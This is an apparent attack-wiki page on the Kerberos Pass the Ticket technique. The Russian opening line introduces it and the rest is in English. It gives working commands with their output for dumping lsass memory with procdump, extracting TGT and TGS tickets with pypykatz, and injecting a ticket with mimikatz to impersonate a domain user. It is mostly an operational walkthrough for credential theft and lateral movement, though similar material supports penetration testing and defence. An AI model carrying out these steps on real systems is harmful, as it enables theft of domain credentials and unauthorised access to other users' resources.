
Используем полученный где-то тикет (TGT или TGS, чаще из LSASS) для доступа к ресурсам или сервисам другого пользователя.

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The Pass the Ticket technique consists on steal a ticket and the associated session key and use them to impersonate the user in order to access to resources or services. Both TGTs and STs can be used, but TGTs are preferred since they allow to access to any service (by using it to request a ST) on behalf of the user, whereas the STs are limited to only one service (or more if the SPN is modified to another service of the same user).

In Windows, the tickets can be found in the lsass process memory, and can be extracted with mimikatz sekurlsa::tickets command or Rubeus dump command. Other possibility is to dump lsass process with tools like procdump, sqldumper or others, and extract the tickets offline with mimikatz or pypykatz. These commands extracts tickets with the krb format.

Dumping lsass memory with procdump:

PS C:\> .\procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals -

[12:03:17] Dump 1 initiated: C:\lsass.dmp
[12:03:18] Dump 1 writing: Estimated dump file size is 34 MB.
[12:03:18] Dump 1 complete: 34 MB written in 1.0 seconds
[12:03:18] Dump count reached.

Retrieving tickets from lsass dump with pypykatz:

$ pypykatz lsa minidump lsass.dmp -k /tmp/kerb > output.txt
INFO:root:Parsing file lsass.dmp
INFO:root:Writing kerberos tickets to /tmp/kerb
$ ls /tmp/kerb/
 lsass.dmp_51a1d3f3.ccache                                                        'TGS_CONTOSO.LOCAL_WS02-7$_WS02-7$_29a9c991.kirbi'
 lsass.dmp_c9a82a35.ccache                                                         TGT_CONTOSO.LOCAL_anakin_krbtgt_CONTOSO.LOCAL_6483baf5.kirbi
 TGS_CONTOSO.LOCAL_anakin_LDAP_dc01.contoso.local_contoso.local_f8a46ad5.kirbi    'TGT_CONTOSO.LOCAL_WS02-7$_krbtgt_CONTOSO.LOCAL_740ef529.kirbi'
'TGS_CONTOSO.LOCAL_WS02-7$_cifs_dc01.contoso.local_b9833fa1.kirbi'                'TGT_CONTOSO.LOCAL_WS02-7$_krbtgt_CONTOSO.LOCAL_77d63cf0.kirbi'
'TGS_CONTOSO.LOCAL_WS02-7$_cifs_dc01.contoso.local_bfed6415.kirbi'                'TGT_CONTOSO.LOCAL_WS02-7$_krbtgt_CONTOSO.LOCAL_7ac74bd6.kirbi'
'TGS_CONTOSO.LOCAL_WS02-7$_ldap_dc01.contoso.local_contoso.local_2129bc1c.kirbi'  'TGT_CONTOSO.LOCAL_WS02-7$_krbtgt_CONTOSO.LOCAL_fdb8b40a.kirbi'

To use the tickets in a Windows machine, you must inject them into the lsass process, which can be done with mimikatz kerberos::ptt command or Rubeus ptt command. These utilities read tickets in the krb format.

Inject TGT into current Windows session:

PS C:\> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( )
 ## \ / ##       >
 '## v ##'       Vincent LE TOUX             ( )
  '#####'        > / ***/

mimikatz # kerberos::ptt pikachu-tgt.kirbi

 * File: 'pikachu-tgt.kirbi': OK

Once the tickets are injected into the session, you can use any tool to perform actions by impersonating the user over the network, like psexec.

Last updated